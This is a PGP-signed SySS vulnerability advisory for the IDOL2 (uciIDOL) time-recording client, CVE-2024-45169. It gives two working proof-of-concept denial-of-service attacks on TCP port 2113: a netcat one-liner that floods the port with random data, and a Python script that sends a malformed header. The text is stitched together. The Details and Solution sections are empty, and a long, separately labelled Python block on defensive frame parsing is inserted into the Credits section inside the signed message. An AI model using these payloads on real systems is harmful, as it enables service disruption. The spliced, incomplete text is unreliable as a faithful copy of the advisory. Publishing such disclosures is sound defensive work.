-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-052
Product:                   IDOL2 (uciIDOL)
Manufacturer:              UCI Software GmbH
Affected Version(s):       <= 2.12
Tested Version(s):         2.12
Vulnerability Type:        Improper Input Validation (CWE-20),
                           Improper Restriction of Operations within the
                           Bounds of a Memory Buffer (CWE-119)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2024-06-26
Solution Date:
Public Disclosure:         2024-08-19
CVE Reference:             CVE-2024-45169
Authors of Advisory:       Ludwig Stage and Manuel Stotz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

IDOL2 is the so-called rich client application of uciIDOL and appears to
provide various functions, e.g. personnel time recording.

The manufacturer describes the product as follows (see [1], translated
from German):

"The uciIDOL product family comprises modular applications for personnel
time recording and production data acquisition as well as for access
control and inventory management. Within these main groups we offer
numerous function modules so that a system tailored to your needs can be
assembled. As required, these can be supplemented with the individually
selectable modules of idolWEB. The web-based applications provide
flexibly deployable extensions and additional options for working with
the uciIDOL applications."

Due to improper input validation, improper deserialization and improper
restriction of operations within the bounds of a memory buffer, IDOL2 is
vulnerable to denial-of-service (DoS) attacks and possibly to remote code
execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Variant 1: send the 3-byte header 0xB0 0x00 0x3c followed by an unbounded
stream of random data to TCP port 2113 of the target host:

# header bytes, then /dev/urandom until the connection is torn down
cat <(echo -en "\xB0\x00\x3c") /dev/urandom | nc 127.0.0.1 2113

Variant 2: send the same header followed by a single byte:

#!/usr/bin/env python3
# Sends one short message to TCP port 2113 of the target host and closes
# the connection.
import socket

HOST = "127.0.0.1"   # target host running IDOL2
PORT = 2113          # port the PoC connects to

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(None)   # blocking mode, no timeout

# the 3-byte header used by both PoC variants, followed by one 0x41 ('A') byte
MESSAGE = b"\xB0\x00\x3c" + b"\x41"
print("Send message: " + str(MESSAGE))
s.sendall(MESSAGE)   # sendall() transmits the whole message before returning
s.close()

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-06-26: Vulnerability reported to manufacturer
2024-06-26: Queries by the manufacturer about the circumstances under
            which the vulnerability was discovered
2024-06-27: Answers given to manufacturer and an offer to talk
2024-06-27: Invitation to a discussion with manufacturer
2024-07-03: Rejection of the offer of a call by the manufacturer
2024-08-12: Advisories sent to the manufacturer prior to publication
2024-08-19: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for uciIDOL
    https://uci.de/products/index.html
[2] SySS Security Advisory SYSS-2024-052
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-052.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] IDOL2 client download site
    https://uci.de/download/idol2-client.html
[5] IDOL2 client binary download
    http://download.uci.de/idol2/idol2Client_2_12.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Ludwig Stage and Manuel Stotz of
SySS GmbH.
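Both PoC variants above send the same 3-byte header, 0xB0 0x00 0x3c, and then either an unbounded stream or a single byte. The following Python is an added example, not part of the advisory and not code from UCI Software GmbH or SySS: it sketches the bounds checks a receiver of such messages needs to survive both inputs. It assumes a hypothetical "type byte, big-endian 16-bit length, payload" layout suggested by that header (0x003c = 60), which the advisory does not confirm; the 4096-byte cap, the accepted type set, the function names and the sample byte strings are all constructed for this example.

```python
import io
import struct

# Assumptions (not confirmed by the advisory): byte 0 is a message type,
# bytes 1-2 a big-endian payload length, then the payload. 0xB0 and the
# length 0x003c = 60 are taken from the advisory's PoC header.
ACCEPTED_TYPES = {0xB0}
MAX_PAYLOAD = 4096      # hypothetical upper bound a receiver should enforce
HEADER_LEN = 3

# Constructed inputs modelled on the two PoC variants.
POC_SHORT = b"\xB0\x00\x3c" + b"\x41"                      # declares 60 bytes, sends 1
POC_FLOOD = b"\xB0\x00\x3c" + b"\x41" * 60 + b"\x00" * 20  # valid frame, then junk
POC_HUGE = b"\xB0\xff\xff" + b"\x41" * 10                   # declares 65535 bytes


class FrameError(ValueError):
    """Raised when a frame violates the framing rules."""


def naive_payload(buf: bytes) -> bytes:
    """Vulnerable pattern: trust the declared length and index by it.
    Python slicing merely truncates; the equivalent memcpy()/recv-into-buffer
    code in C reads or writes past the data actually received (CWE-119)."""
    (length,) = struct.unpack(">H", buf[1:3])
    return buf[HEADER_LEN:HEADER_LEN + length]


def read_exact(stream, n: int) -> bytes:
    """Read exactly n bytes or raise; never hand back a short read as complete."""
    data = bytearray()
    while len(data) < n:
        chunk = stream.read(n - len(data))
        if not chunk:
            raise FrameError(f"stream ended after {len(data)} of {n} bytes")
        data += chunk
    return bytes(data)


def read_frame(stream) -> tuple:
    """Hardened reader: validate type and length before touching the payload."""
    hdr = read_exact(stream, HEADER_LEN)
    msg_type = hdr[0]
    (length,) = struct.unpack(">H", hdr[1:3])
    if msg_type not in ACCEPTED_TYPES:
        raise FrameError(f"unknown message type 0x{msg_type:02x}")
    if length > MAX_PAYLOAD:
        # reject before any buffer is sized by the attacker-controlled length
        raise FrameError(f"declared length {length} exceeds cap {MAX_PAYLOAD}")
    return msg_type, read_exact(stream, length)


def read_all_frames(raw: bytes) -> list:
    """Consume a byte stream frame by frame and record each accept/reject.
    Bytes after a valid frame are parsed as a new header and rejected on
    their own terms instead of being appended to the previous payload."""
    stream = io.BytesIO(raw)
    results = []
    while stream.tell() < len(raw):
        try:
            msg_type, payload = read_frame(stream)
            results.append(("ok", msg_type, len(payload)))
        except FrameError as exc:
            results.append(("rejected", str(exc)))
            break   # framing is lost; a real receiver would close the connection
    return results


if __name__ == "__main__":
    print("naive payload for short PoC:", naive_payload(POC_SHORT))
    for name, sample in (("short", POC_SHORT), ("flood", POC_FLOOD), ("huge", POC_HUGE)):
        print(name, read_all_frames(sample))
```

The two PoC shapes map onto two checks: read_exact() refuses to treat a short read (the single-byte variant) as a complete frame, and consuming exactly the declared length keeps the trailing bytes of the unbounded variant from being appended to the previous payload. The length cap rejects a hostile length before any allocation or copy depends on it, which is the step the naive pattern skips.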
E-Mail: ludwig.stage@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Ludwig_Stage.asc
Key Fingerprint: C2FF F40D FC78 791E EF81 20DF 4B57 48C9 53A5 EE5E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEwv/0Dfx4eR7vgSDfS1dIyVOl7l4FAmbG7M8ACgkQS1dIyVOl
7l4LUBAAi8lBrw6lbA99/6r7TytffG9bIrNeiu8UHILzvIEMAOEbBepjwPBIqJtX
tkZk2f/GOKy3QJX6YJoLf7IY1TfT9LV+FaFVmgTnu83yom0nrhN247SrpT8oiKgQ
bkmcL3FJDTp/6DRPlFNaNHJCalrpuEt1nvUxU18/LeQwwq41OA2afd6AZ+nOiZoe
1tsYEYbjQ8RImXls3EubalxHHLGjvh+l60aJLrxMvjCZ0LXcvrlM5BNkDzP6qeKu
y0Yc/0MHCx35Oywchqblii8QwaKROouQ1Q5Z2K50GyaW41eUsU0+TWE6cOmsxJZ6
AayKD5H0uDAqQSJAb1fLeoiYz5Txz4k/WKdAjZ5mEhhK9P4RWLORiaXSUK6k3P4O
dOMvaLK7QOn8SCmVc9EOYRwVfOjjDB8tGAXeNYX3NQ7yA20MmdOfQxjzrWztq9Pr
4uu3CkfhZD/cIODk/7qhN0Ax0+j4N2t9dakBvQUIVGstMhQ+4Q0G0OBw28ch9mnQ
lZkyLc+DUljS+HMjvJ90lnL5/sheIb6kxre9ufX5s9AnZWHYonEj3DChe1PzZnXD
VOQ+/ga+6fhroleYiNxqUXCPuLu1zx3hfDPZ4Ld+BW8tqcEYoOX4k3TTILnNZ+QZ
82KureuTr//L5Wx8O/YLlIcJxQrrHp5e4na2LjCNeaCU3Yj4SuA=
=YeTW
-----END PGP SIGNATURE-----